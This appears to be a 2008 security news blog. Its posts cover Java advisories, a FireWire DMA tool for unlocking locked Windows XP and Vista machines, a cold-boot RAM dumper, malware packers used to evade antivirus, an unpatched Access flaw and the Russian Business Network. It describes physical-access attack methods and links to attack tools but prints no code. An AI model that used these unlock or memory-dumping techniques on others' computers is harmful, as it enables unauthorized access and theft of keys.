Sun Alert 233321 - Two Security Vulnerabilities in the Java Runtime Environment Virtual Machine

Sun Alert 233322 - Security Vulnerability in the Java Runtime Environment with the Processing of XSLT Transformations

Sun Alert 233323 - Multiple Security Vulnerabilities in Java Web Start May Allow an Untrusted Application to Elevate Privileges

Sun Alert 233324 - A Security Vulnerability in the Java Plug-in May Allow an Untrusted Applet to Elevate Privileges

Sun Alert 233325 - Vulnerabilities in the Java Runtime Environment image Parsing Library

Sun Alert 233326 - Security Vulnerability in the Java Runtime Environment May Allow Untrusted JavaScript Code to Elevate Privileges through Java APIs

Sun Alert 233327 - Buffer Overflow Vulnerability in Java Web Start May Allow an Untrusted Application to Elevate its Privilege

Unlock a Windows PC without the password through Firewire (UPDATED)

During the whole "disk encryption defeated by RAM attack", I mentioned firewire could be used for memory forensics since it provides DMA (direct memory access). Apparently, it can also be useful to unlock a windows PC without a password.

A security consultant based in New Zealand has released a tool that can unlock Windows computers in seconds without the need for a password.
Adam Boileau first demonstrated the hack, which affects Windows XP computers but has not yet been tested with Windows Vista, at a security conference in Sydney in 2006, but Microsoft has yet to develop a fix.

Interviewed in ITRadio's Risky Business podcast, Boileau said the tool, released to the public today, could "unlock locked Windows machines or login without a password ... merely by plugging in your Firewire cable and running a command".

Full article (Source: smh.com.au)

The code can be downloaded here.

UPDATE (06/03/2008): I didn't mention it clearly but even if you don't have a firewire port, having a PCMCIA slot is as dangerous. I even saw some remarks that external SATA ports, also provide DMA access. I feel more tools coming our way.

Using a laptop with built-in Firewire and booted with the Helix Linux LiveCD (designed for forensics and incident response) that includes Adam’s original Python Firewire tools (minus winlockpwn which I downloaded once booted), I tested my theory by plugging in a cheap StarTech PCMCIA Firewire card to the target laptop running Windows XP SP2 whose screen was locked. I gave the target a few seconds to load the drivers, and then connected my attack laptop’s Firewire port to the PCMCIA Firewire port. After running winlockpwn, I logged into the target laptop with a few random keystrokes (which were not the password). Voila! No need for the victim to have Firewire built in. (Source: Darkreading.com)

UPDATE (07/03/2008): It also works against Vista.

In this paper, we demonstrate that the firewire unlock attack (as implemented in Adam Boileau's winlockpwn) can be used against Windows Vista.

The paper is available at:

http://www.sec-consult.com/fileadmin/Whitepapers/Vista_Physical_Attacks.pdf

UPDATE (29/03/2008): I have written a tutorial.

Wednesday

Fun: How to detect your son is a computerhacker

I just wanted to share this little gem with you. Lunix...moewahaha...... Flash is a hacker tool and asking an AMD processor is a cause for concern. Beware of the haxxor!!!!

Is Your Son a Computer Hacker?

Report: March Symantec State of Spam

From Symantec:

Social engineering was the driving force behind spammers during the month of February. While overall spam volume hovered steadily at 78.5% of email and tactics remained relatively the same, the use of events, big brands, and public figures drove spam campaigns during the month. The March State of Spam report highlights several of these.

Read full report.

A tool to use the cold boot encryption attack

About a week ago, some researchers demonstrated how encryption keys can be retrieved from memory if the attacker has physical access to a computer which is switched on or in standby.

Someone from McGrewSecurity released a tool called msrampdmp that does just that. He put together a utility that runs under syslinux to capture the data and installed it to a USB thumb drive. He managed to create a device that will boot on a machine and copy the contents of the RAM before it's overwritten by another utility.

The Princeton researchers applied this method to the recovery of encryption keys, with great results. They also cooked up a way to image the contents of RAM with a very small footprint, only overwriting a small amount of memory in the process. Unfortunately, at the time of writing this, their tool, ram2usb, hasn't been released. I decided that it wouldn't be hard to go ahead and implement one myself, based off their paper and youtube video posted above, so that I (and others) can go ahead and start having fun.

So, as a small side project, I've written "msramdmp", the McGrew Security RAM Dumper. Enjoy!

Webbased Google Hacking Database Tool launched

On the heels of Goolag, Gnucitizen launches their Webbased Google Hacking Database Tool. No need to install software:

I am happy to inform you that I’ve been doing some work on our Google Hacking Database Tool here, as it is entirely web-based. lately. The tool is now pretty stable and it has a better looking, and a lot more intuitive interface. YYou can enjoy the tool right now from here, as it is entirely web-based.

Tuesday

Storm Worm/Nuwar is beginning a new wave

After it's Xmas campaign, after it's Valentine Campaign, it's back to generic e-Card spam.

More details:

From hearts to postcards, storms back (SANS ISC)
Storm Reactivating (F-Secure)
Nuwar’s New Wave (McAfee Avertlabs)

Why are antivirus products having a hard time?

I really respect the people who make anti-malware software. Malware writers are not making it easy on them. Before we move on to this topic. Let's first provide some terminology with courtesy of anti-virus rants:

Now, let's talk about 2 reasons why AV products are having a hard time:

1. They are using software to test the (un)detection of AV scanner before releasing them:

When VirusTotal was born a few years ago, some people were claiming that it was being used by malware developers to test their creations. In some cases, we knew it was true, as we have seen some advertisements in forums showing the scanning results from VirusTotal claiming that certain malware was not detected by any vendor. On January 3rd, VirusTotal decided to remove the option "Do not distribute the sample", so each and every file could be sent to any antivirus vendor.

Since then, we have seen that some underground communities have retaken several projects that allow users to have a tool for analysing their creations. This is one of the first tools that have been used, known as KIMS

Read full article @ Pandablog

2. They use packers to obfuscate their executables and try to customize them:

Malware authors often use their own protections or packers to prevent automated unpacking of their executables. This is an attempt to delay development of antivirus (AV) signatures or in-depth behavioral analysis. Scramblers, tools designed to modify the packed binary to help throw off signature-based scanners, are often used as well. In fact, a public protector called [MSLRH] not only packs the executable and protects it using anti-debug, anti-dump, and stolen-byte mechanisms, but also offers the option to choose which protector the executable should appear as in PEiD and other signature-based scanners. [MSLRH] then places the typical byte sequence of that packer at the entry point of the executable, likely throwing off some analysts and automated unpackers. This type of tool is also used by legitimate software authors to protect their intellectual property.

Read full article @ Websense

Previous articles:

Webcast: "Penetration Testing Ninjitsu"

Here is the recorded version of “Penetration Testing Ninjitsu” with Ed Skoudis and here are the slides. It's some basic stuff but still fun to watch. For the advanced stuff, you have to take his course.

Monday

Deming’s Seven Deadly Diseases applied to Information Security

Riskanalys.is has an excellent piece on the seven deadly diseases and how to convert them to information security:

As we look at the father of quality management and see if he’s got any relevance to what we’re doing (after all, security could be said to be a key aspect of IT Quality of Service), we come across what Deming calls the Seven Deadly Diseases. These are things that cause business to perform poorly. I’ve been thinking about analogues for us as I’ve read them, and some of my comparisons might be a stretch of interpretation, but I think these are not unimportant for us to meditate on a little.

Read more.

Yet another (0-day) office exploit

Pandalabs might have discovered a 0-day in MS Access. I'm trying to see if this is confirmed by others. As if we didn't have enough issues with (other) MS Office documents up till now. There is still an unpatched excel vulnerability on the loose.

Last week, John Fellers sent us a sample that exploited a flaw in MS Access. We thought it was the same vulnerability sent to Bugtraq on November and announced by McAfee in December. However a deeper analysis reveals that it's a new vulnerability. We are still analyzing the exploit to find out more information, though at first sight it seems to be a flaw in Jet Engine (msjet40.dll).

A simple search in Google (with the name of the mdb file as the query) reveals it was sent to a public forum in Nabble in February. Although these vulnerabilities allow remote code execution, Microsoft replied that they would not fix these mdb vulnerabilities, as it seems they will not acknowledge vulnerabilities which are from .mdb files:
"You appear to be reporting an issue with a file type Microsoft
considers to be unsafe. Many programs, such as Internet Explorer and
Outlook, automatically block these files. For more information, please
visit http://support.microsoft.com/kb/925330"

Central Belgian warning system against internetfraud

Information Sharing and Analysis Centers (ISACs) are a very critical tool in case of targeted attacks . The methodology of the attack can be shared to that other organizations can verify their systems for similar compromise or improve their preventive controls to avoid compromise. We have organizations like ISSA , OWASP and ISACA but their role today is not the kind of detailed information an ISAC could provide. This is why I was quite happy when I saw the following article from Datanews (translated for you):

All banks will soon be connected to a computersystem with which they can rapidly alert other banks in case of fraud. This should be a solution to the coordinated attacks seen on Belgian internet bank accounts says "De Tijd".

The warnings will be anonymous so that other banks won't know which competitor was the victim.

...
According to Reynders, up till now, there are only 59 known cases of compromised online accounts of which 34 were during last year. In other countries, these figures are a lot higher.

I would say, kudos for this initiative. I would like to see this expand (or created) for other sectors and companies as well. Maybe a real national Belgian CERT (which we lack at the moment)?

VMWorld Europe: An update on security features

This might be the result of the acquisition of Determina last year:

CANNES, France, Feb. 27 /PRNewswire-FirstCall/ -- VMware, Inc. (NYSE: VMW - News), the global leader in virtualization solutions from the desktop to the datacenter, today announced new security technology called VMware VMsafe(TM) that protects applications running in virtual machines in ways previously not possible in physical environments. The VMsafe APIs allow vendors to develop advanced security products that combat the latest generation of malware. VMsafe technology integrates into the VMware hypervisor and provides the transparency to prevent threats and attacks such as viruses, trojans and keyloggers from ever reaching a virtual machine. Twenty security vendors have embraced VMsafe technology and are building products that will further enhance the security of virtual machines, making the virtual environment unmatched in the level of security and protection it provides compared to physical systems. (Source: Yahoo) (Thanks Jon)

The RTFM blog also covered the technology: VMworld 2008 Europe: Day Two: Key Note

The rest of his coverage of the event might also be worth reading.

UPDATE: Critical VMware Security Alert for Windows-Hosted VMware Workstation, VMware Player, and VMware ACE

Updated paper on the Russian Business Network

First, I want to acknowledge the work David Bizeul put in his 70-page paper last november. But soon after that, the Russion Business Network went into hiding. Some reports talked about them setting up shop in Taiwan, China and Turkey. Thanks to the folks at Shadowserver, we are getting a good update about the current whereabouts:

In the last few months, there has been a significant amount of press coverage given to insidious cyber activity associated with the segment of the Internet known as the “Russian Business Network,” or RBN. Previous studies have suggested that the RBN has ties to nearly every area of cybercrime, including: phishing, malware, DDOS activity, pornography, botnets, and anonymization.

In November 2007, media reporting indicated that a large portion of the RBN “went dark.” Since that time, the Shadowserver Foundation has been more closely analyzing outlying networks implicated as being associated with RBN. One of these suspected outliers is AS9121, known as TurkTelekom. SecurityZone.org reported in early December 2007 that while not everything in TurkTelekom appears to be malicious, there are some ranges that are “particularly bad” and analysis of Shadowserver Foundation data agrees. Several subranges quickly stand out as being deeply involved in malicious cyber activity: 88.255.90.0/24 and 88.255.94.0/24. IP registration indicates these ranges are listed under the name “ABDALLAH INTERNET HIZMETLERI” (AIH).

Download report (pdf).